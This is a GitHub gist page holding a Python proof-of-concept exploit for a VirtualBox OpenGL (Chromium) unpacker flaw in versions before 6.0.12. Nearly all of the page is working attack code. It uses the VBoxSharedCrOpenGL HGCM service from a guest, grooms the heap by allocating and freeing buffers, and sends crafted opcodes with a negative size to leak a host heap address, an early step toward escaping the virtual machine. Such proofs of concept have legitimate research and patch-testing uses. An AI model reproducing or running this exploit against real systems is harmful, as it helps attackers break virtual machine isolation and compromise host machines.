This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author : peternguyen93 | |
| import sys | |
| sys.path.append('../') # back to vboxlib module | |
| from vboxlib.hgcm import * | |
| from vboxlib.chromium import * | |
| from ctypes import * | |
| ''' | |
| Affect VirtualBox version < 6.0.12 | |
| ./VirtualBox/src/VBox/GuestHost/OpenGL/include/cr_unpack.h | |
| --------------------------------------------------------------------- | |
| #define INCR_DATA_PTR( delta ) \ | |
| cr_unpackData += (delta) | |
| #define INCR_VAR_PTR() \ | |
| INCR_DATA_PTR( *((int *) cr_unpackData ) ) | |
| --------------------------------------------------------------------- | |
| ''' | |
| op2 = b'' | |
| op2+= pack('<I', 0x28) # size opcode (we control) | |
| op2+= pack('<I',CR_GETUNIFORMLOCATION_EXTEND_OPCODE) | |
| op2+= pack('<I', 0x1000) # size (n) | |
| op2+= b'A'*4 # padding | |
| # op1 = pack('<B', CR_EXTEND_OPCODE) | |
| op1 = b'' | |
| op1+= pack('<I', c_uint32(-0x2050).value) # size opcode (we control) | |
| op1+= pack('<I', CR_GETATTRIBSLOCATIONS_EXTEND_OPCODE) | |
| op1+= pack('<II', 48, 64) | |
| op1+= b'A'*0x20 | |
| msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
| msg+= pack('<I', 2) # number of opcode | |
| msg+= b'\x00'*2 # padding | |
| msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
| msg+= op1 | |
| msg = msg.ljust(4096, b'X') | |
| tmp_msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
| tmp_msg+= pack('<I', 1) # number of opcode | |
| tmp_msg+= b'\x00'*2 # padding | |
| tmp_msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
| tmp_msg+= op1 | |
| tmp_msg+= op2*((4096 - len(tmp_msg)) // len(op2)) | |
| tmp_msg = tmp_msg.ljust(4096, b'P') | |
| client = hgcm_connect('VBoxSharedCrOpenGL') | |
| set_version(client) | |
| client1 = hgcm_connect('VBoxSharedCrOpenGL') | |
| set_version(client1) | |
| buf1 = alloc_buf(client, 0x1000, tmp_msg) | |
| buf2 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
| buf3 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
| buf4 = alloc_buf(client, 0x1000, tmp_msg) # msg extend goes here | |
| print('free buf4') | |
| msg_dispatch(client, buf4) # free buf4 | |
| print('alloc buf4') | |
| buf5 = alloc_buf(client1, 0x1000, msg) # locale in the last of heap | |
| print('free buf3') | |
| msg_dispatch(client, buf3) | |
| print('free buf2') | |
| msg_dispatch(client, buf2) | |
| print('execute buf5') | |
| res = msg_dispatch(client1, buf5) | |
| print(repr(res)[:64]) | |
| heap_address = unpack('<Q', res[8:16])[0] | |
| print('heap:', hex(heap_address)) | |
| hgcm_disconnect(client) | |
| hgcm_disconnect(client1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment